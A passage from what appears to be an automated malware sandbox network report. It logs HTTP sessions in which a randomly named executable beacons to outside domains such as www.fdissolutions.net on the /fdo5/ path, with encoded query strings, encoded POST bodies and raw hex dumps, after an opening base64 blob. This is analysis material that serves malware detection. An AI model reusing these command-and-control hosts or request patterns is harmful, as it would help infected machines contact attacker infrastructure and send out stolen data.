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
                                                                                              Dec 3, 2023 16:26:14.150461912 CET857INHTTP/1.1 200 OK
                                                                                              server: nginx
                                                                                              date: Sun, 03 Dec 2023 15:26:09 GMT
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              transfer-encoding: chunked
                                                                                              vary: Accept-Encoding
                                                                                              content-encoding: gzip
                                                                                              x-via: ASH1
                                                                                              connection: close
                                                                                              Data Raw: 32 33 44 0d 0a 1f 8b 08 00 00 00 00 00 04 03 7d 54 6d 6f d3 30 10 fe 2b a7 4e 53 40 aa 9b 74 dd 06 0a 49 11 2f e2 1b 88 0f 9b c4 d7 ab 73 89 ad fa 25 d8 de ba 82 f8 ef d8 2e eb 42 c5 48 a4 c8 3e 3f cf dd 73 2f 4e 23 82 56 eb 46 10 76 6b 80 46 53 40 e0 02 9d a7 d0 ce 6e 6f 3e b1 d7 b3 a3 dd a0 a6 76 76 2f 69 37 5a 17 66 c0 ad 09 64 22 6e 27 bb 20 da 8e ee 25 27 96 37 73 90 46 06 89 8a 79 8e 8a da e5 a2 7a f2 23 42 18 19 7d bf 93 f7 ed ec 1b bb 7d c7 3e 58 3d 62 90 1b 45 13 a7 92 5a ea 06 fa 37 8d 23 17 c4 92 00 67 d5 84 a4 f1 81 e1 40 6d 35 83 f2 a8 7b 1a ef 39 a2 b1 2c 1f 3d c7 a3 87 51 3a f2 93 50 cf 86 18 1d 0e 1a 27 c8 13 df 41 06 45 eb 1b 21 3d 74 56 a3 34 10 57 1b 87 a6 03 43 bb a6 3c 9c c7 66 f8 b0 8f 40 80 d4 22 80 9f 10 9f 3e 66 cc bc fc 41 35 5c 5f 2c ae ce df 00 fc 02 d8 d8 6e ff 07 a0 d1 0d d2 d4 50 c5 13 80 11 bb 4e 9a e1 71 3b 61 2f 17 d7 8e 74 06 71 ab ac ab e1 6c 75 95 de 6c da 20 df 0e ce de 99 ae 06 25 0d a1 63 83 c3 4e c6 6e bf 08 36 c6 0b c1 ea 39 9c 71 ce e3 b7 ef 7b 58 55 e7 2f 4f a8 cc d1 48 18 6a 88 f9 1f 96 11 10 d5 8a e5 5c ac a6 f9 f4 a8 a5 da d7 50 7c 8e d9 79 72 0e 43 31 07 8f c6 b3 b8 93 7d f6 1b e8 21 30 54 72 88 c9 f1 a8 83 5c 36 ff 37 df cc 09 b1 b2 be b7 4e d7 70 37 8e e4 38 7a 7a 14 72 52 b4 8b 2a d6 04 2a 58 3e 96 66 52 b0 d5 c1 96 f4 ff 25 7e 47 72 10 39 49 a7 51 65 4d 13 d6 72 71 79 e4 35 e5 a1 a1 4d 99 6f 5b 93 ba 96 66 54 2c 0f c3 f0 f1 38 0c ef f3 30 7c 49 c3 10 0f 13 64 b5 fe aa 28 0a 8f 77 93 f8 16 52 7f 00 87 34 3b de 5a 13 61 ab 04 8b ad da 82 70 d4 b7 45 9a 79 5f 97 65 d2 e2 17 83 b5 43 e4 8f d2 2f b8 d5 25 f7 fe ed a1 e8 ed 53 c9 eb cb aa 9a bf aa aa 02 1c a9 b6 c8 5a bd 20 0a 05 84 fd 48 6d 91 aa 99 a8 c5 ba 29 b3 f6 18 36 fd 3c 7e 03 fb 89 2c 19 43 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: 23D}Tmo0+NS@tI/s%.BH>?s/N#VFvkFS@no>vv/i7Zfd"n' %'7sFyz#B}}>X=bEZ7#g@m5{9,=Q:P'AE!=tV4WC<f@">fA5\_,nPNq;a/tqlul %cNn69q{XU/OHj\P|yrC1}!0Tr\67Np78zzrR**X>fR%~Gr9IQeMrqy5Mo[fT,80|Id(wR4;ZapEy_eC/%SZ Hm)6<~,C0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.449744185.151.30.138802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:26:16.668056965 CET461OUTGET /fdo5/?fXUX=ShJ8DFcXvtj84pw&540H2x=EAzFkHRwipdrFLRPzn8XfH22pTdKYWJnyl4LcH+flh+EU/cAs0/QFXMo9vl/d0UKRaBGjYTaeopZ/0cAzgqORqEzisMthiMtgw== HTTP/1.1
                                                                                              Host: www.quote2bill.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Dec 3, 2023 16:26:16.767751932 CET1340INHTTP/1.1 200 OK
                                                                                              server: nginx
                                                                                              date: Sun, 03 Dec 2023 15:26:09 GMT
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              transfer-encoding: chunked
                                                                                              vary: Accept-Encoding
                                                                                              x-via: ASH1
                                                                                              connection: close
                                                                                              Data Raw: 34 34 33 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 65 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 20 2f 3e 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 20 20 3c 74 69 74 6c 65 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 62 72 61 6e 64 20 6e 65 77 3c 2f 74 69 74 6c 65 3e 20 20 3c 73 74 79 6c 65 3e 20 20 68 74 6d 6c 20 20 7b 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 32 2e 35 25 3b 20 20 7d 20 20 62 6f 64 79 20 20 7b 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 36 72 65 6d 3b 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 35 33 35 33 35 3b 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 23 63 63 63 2c 20 23 66 66 66 20 33 30 25 29 3b 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 20 20 7d 20 20 68 31 2c 68 33 20 20 7b 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4d 6f 6e 74 73 65 72 72 61 74 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 20 20 20 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 75 70 70 65 72 63 61 73 65 3b 20 20 7d 20 20 68 31 20 20 7b 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30 72 65 6d 20 30 20 31 72 65 6d 3b 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 20 20 7d 20 20 68 33 20 20 7b 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 72 65 6d 3b 20 20 7d 20 20 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 20 20 3c 68 31 3e 54 68 69 73 20 44 6f 6d 61 69 6e 20 69 73 20 42 72 61 6e 64 20 4e 65 77 3c 2f 68 31 3e 20 20 3c 68 33 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 62 61 63 6b 20 61 67 61 69 6e 20 73 6f 6f 6e 3c 2f 68 33 3e 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 34 30 30 2c 37 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 3c 2f 62 6f 64 79 3e 3c 2f 68
                                                                                              Data Ascii: 443<html><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <meta http-equiv="cache-control" content="max-age=0" /> <meta http-equiv="cache-control" content="no-cache" /> <meta http-equiv="expires" content="0" /> <meta http-equiv="pragma" content="no-cache" /> <title>This domain is brand new</title> <style> html { font-size: 62.5%; } body { margin: 0; padding: 0; font-size: 1.6rem; color: #353535; background: linear-gradient(to bottom, #ccc, #fff 30%); background-repeat: no-repeat; } h1,h3 { font-family: 'Montserrat', sans-serif; text-align: center; margin: 0; padding: 0; text-transform: uppercase; } h1 { margin: 20rem 0 1rem; font-size: 3rem; } h3 { font-weight: normal; font-size: 1.4rem; } </style></head><body> <h1>This Domain is Brand New</h1> <h3>Please check back again soon</h3> <link href='https://fonts.googleapis.com/css?family=Montserrat:400,700' rel='stylesheet' type='text/css'></body></h
                                                                                              Dec 3, 2023 16:26:16.767774105 CET65INData Raw: 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                              Data Ascii: tml>0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.449745109.68.33.25802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:26:30.659818888 CET733OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.fdissolutions.net
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.fdissolutions.net
                                                                                              Referer: http://www.fdissolutions.net/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 187
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 76 6c 41 49 67 43 6a 6d 48 42 61 61 6c 41 64 44 55 6b 36 51 59 6d 49 39 62 50 64 61 6c 76 37 50 51 6c 33 55 63 46 65 70 73 5a 51 30 70 73 78 41 36 52 66 42 77 4a 42 50 62 6d 65 35 75 32 57 2b 6c 66 48 36 6b 45 52 53 7a 2b 59 46 4d 4b 62 74 43 74 4e 49 6a 43 51 67 35 54 76 31 39 53 6c 4c 4b 5a 54 56 31 68 5a 70 33 45 31 34 63 6c 6e 46 47 71 5a 61 4c 4b 52 52 43 67 37 35 52 57 55 52 67 74 61 42 53 2f 57 6e 4a 36 36 6f 70 6d 4d 69 6e 6f 78 35 31 51 5a 52 38 50 36 4f 49 70 47 6f 39 53 61 31 63 54 7a 71 77 70 39 34 79 74 4b 36 65 77 3d 3d
                                                                                              Data Ascii: 540H2x=vlAIgCjmHBaalAdDUk6QYmI9bPdalv7PQl3UcFepsZQ0psxA6RfBwJBPbme5u2W+lfH6kERSz+YFMKbtCtNIjCQg5Tv19SlLKZTV1hZp3E14clnFGqZaLKRRCg75RWURgtaBS/WnJ66opmMinox51QZR8P6OIpGo9Sa1cTzqwp94ytK6ew==
                                                                                              Dec 3, 2023 16:26:30.842624903 CET1340INHTTP/1.1 404 Not Found
                                                                                              content-type: text/html
                                                                                              server: Microsoft-IIS/10.0
                                                                                              x-powered-by: ASP.NET
                                                                                              date: Sun, 03 Dec 2023 15:26:30 GMT
                                                                                              content-length: 1245
                                                                                              connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f
                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are loo
                                                                                              Dec 3, 2023 16:26:30.842659950 CET193INData Raw: 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61
                                                                                              Data Ascii: king for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.449746109.68.33.25802492C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 3, 2023 16:26:33.361574888 CET753OUTPOST /fdo5/ HTTP/1.1
                                                                                              Host: www.fdissolutions.net
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Origin: http://www.fdissolutions.net
                                                                                              Referer: http://www.fdissolutions.net/fdo5/
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Cache-Control: no-cache
                                                                                              Connection: close
                                                                                              Content-Length: 207
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Data Raw: 35 34 30 48 32 78 3d 76 6c 41 49 67 43 6a 6d 48 42 61 61 6c 68 74 44 57 48 53 51 51 6d 49 79 56 76 64 61 76 50 37 4c 51 6c 7a 55 63 48 7a 73 73 76 6f 30 73 35 64 41 31 77 66 42 78 4a 42 50 52 47 65 38 71 32 58 38 6c 66 61 46 6b 45 74 53 7a 2b 63 46 4d 49 54 74 44 65 31 4a 6a 53 51 6d 78 7a 76 7a 69 43 6c 4c 4b 5a 54 56 31 6c 31 50 33 45 74 34 63 56 58 46 48 50 31 64 49 4b 52 65 57 77 37 35 47 47 55 64 67 74 62 6b 53 38 53 64 4a 2f 2b 6f 70 6e 38 69 6e 35 78 32 2f 51 5a 62 79 76 37 6e 4a 37 58 47 77 44 32 30 4e 6a 62 66 36 75 67 36 7a 34 6d 70 5a 4d 53 4a 6f 63 46 59 56 70 5a 68 48 67 56 30 6a 2b 47 39 72 42 67 3d
                                                                                              Data Ascii: 540H2x=vlAIgCjmHBaalhtDWHSQQmIyVvdavP7LQlzUcHzssvo0s5dA1wfBxJBPRGe8q2X8lfaFkEtSz+cFMITtDe1JjSQmxzvziClLKZTV1l1P3Et4cVXFHP1dIKReWw75GGUdgtbkS8SdJ/+opn8in5x2/QZbyv7nJ7XGwD20Njbf6ug6z4mpZMSJocFYVpZhHgV0j+G9rBg=
                                                                                              Dec 3, 2023 16:26:33.548120975 CET1340INHTTP/1.1 404 Not Found
                                                                                              content-type: text/html
                                                                                              server: Microsoft-IIS/10.0
                                                                                              x-powered-by: ASP.NET
                                                                                              date: Sun, 03 Dec 2023 15:26:32 GMT
                                                                                              content-length: 1245
                                                                                              connection: close
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 